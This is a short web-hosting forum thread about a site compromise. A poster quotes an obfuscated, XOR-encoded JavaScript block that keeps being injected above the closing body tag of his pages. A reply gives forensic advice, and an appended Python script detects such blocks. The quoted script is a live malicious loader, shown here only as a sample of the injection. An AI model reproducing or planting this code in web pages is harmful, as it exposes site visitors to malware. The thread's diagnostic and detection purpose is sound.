Thread: Big Security Issue

  1. #1
    Junior Member Newbie
    Join Date
    Aug 2007
    Posts
    4

    Big Security Issue

    Hello,

    A lot of my sites on 2 different VPSes I have with spry have this issue.

    Somehow the following JavaScript code gets embedded on my sites right above the closing </body> tag, resulting in anti-virus programs denying access to the page, as they say these are viruses.

    HTML Code:
    <script language="JavaScript">e = '0x00' + '3A';str1 = "%81%D9%D2%CF%A5%C8%C9%C2%D1%DE%86%9B%CF%D2%C8%D2%DB%D2%D1%D2%C9%C2%83%DD%D2%D9%D9%DE%D7%9B%87%81%D2%DF%CB%DA%D6%DE%A5%C8%CB%D8%86%9B%DD%C9%C9%D5%83%94%94%D1%D2%D5%D4%D8%D7%C9%97%D8%D4%D6%94%D1%D9%94%D4%CF%CB%94%9B%A5%CC%D2%D9%C9%DD%86%8A%A5%DD%DE%D2%DC%DD%C9%86%8A%87%81%94%D2%DF%CB%DA%D6%DE%87%81%94%D9%D2%CF%87";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
    Does anyone know how to fix/prevent this from happening as it is a MAJOR pain to always remove it and then it somehow gets added again.

    Thanks,
    Joe

  2. #2
    Junior Member Newbie
    Join Date
    Apr 2007
    Posts
    23

    I would check the last modified time/date of the suspect files, then check your logs for who logged in around that time. I suspect your system is already compromised, so take care in believing some of the typical system utilities. Or you can run a chkrootkit or some such tool.

    Also take care of what programs are running now and kill -9 off processes that you don't recognize.
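
Added example (not part of the thread and not either poster's code): a Python sketch of the first step suggested in reply #2, listing every page that carries a script block shaped like the one quoted in post #1, oldest modification first, so the timestamps can be compared against login and FTP logs. The file extensions, the function names and the shortened `SAMPLE` page are assumptions constructed for illustration.

```python
import os
import re
import sys
from datetime import datetime, timezone

# A <script> block, optionally followed (after whitespace) by </body>.
SCRIPT = re.compile(rb"<script\b[^>]*>(.*?)</script>\s*(</body>)?", re.I | re.S)
# Calls the quoted injected block combines to decode and emit its markup.
TOKENS = (b"unescape(", b"String.fromCharCode(", b"document.write(")

# Constructed sample page: same shape as the block in post #1, dummy payload.
SAMPLE = (b'<html><body><p>hi</p>\n<script language="JavaScript">'
          b'str1="%00%00";tmp=unescape(str1);'
          b'str=String.fromCharCode(tmp.charCodeAt(0));document.write(str);'
          b'</script>\n</body></html>')

def is_injected(html: bytes) -> bool:
    """True if a decoder-style script sits directly above </body>."""
    return any(m.group(2) and all(t in m.group(1) for t in TOKENS)
               for m in SCRIPT.finditer(html))

def scan(root, exts=(".html", ".htm", ".php")):
    """Return (mtime, path) for each matching file under root, oldest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if is_injected(data):
                hits.append((os.stat(path).st_mtime, path))
    return sorted(hits)

def report(hits):
    """Format hits as UTC timestamps for comparison with log entries."""
    # mtimes can be reset by whoever modified the file: treat them as leads.
    return [f"{datetime.fromtimestamp(t, timezone.utc):%Y-%m-%d %H:%M:%S}Z  {p}"
            for t, p in hits]

if __name__ == "__main__":
    for line in report(scan(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(line)
```

Run it against a copy of the web root, or from a system you trust, since reply #2 warns that utilities on the affected host may not be reliable.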
